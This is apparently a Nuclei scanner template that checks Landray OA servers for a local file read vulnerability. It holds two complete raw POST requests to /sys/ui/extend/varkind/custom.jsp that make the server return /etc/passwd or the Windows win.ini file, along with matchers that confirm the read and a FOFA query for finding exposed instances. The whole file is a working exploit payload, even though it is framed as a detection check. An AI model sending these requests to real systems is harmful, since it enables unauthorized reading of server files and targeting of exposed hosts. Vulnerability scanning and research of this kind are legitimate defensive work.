id: landray-oa-file-read

info:
  name: Landray OA File Read
  author: zp857
  severity: high
  tags: landray-oa,lfi
  metadata:
    fofa-query: 'app="Landray-OA系统"'

requests:
  - raw:
      - |
        POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        var={"body":{"file":"file:///etc/passwd"}}

      - |
        POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        var={"body":{"file":"file:///c://windows/win.ini"}}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "for 16-bit app support"

      - type: status
        status:
          - 200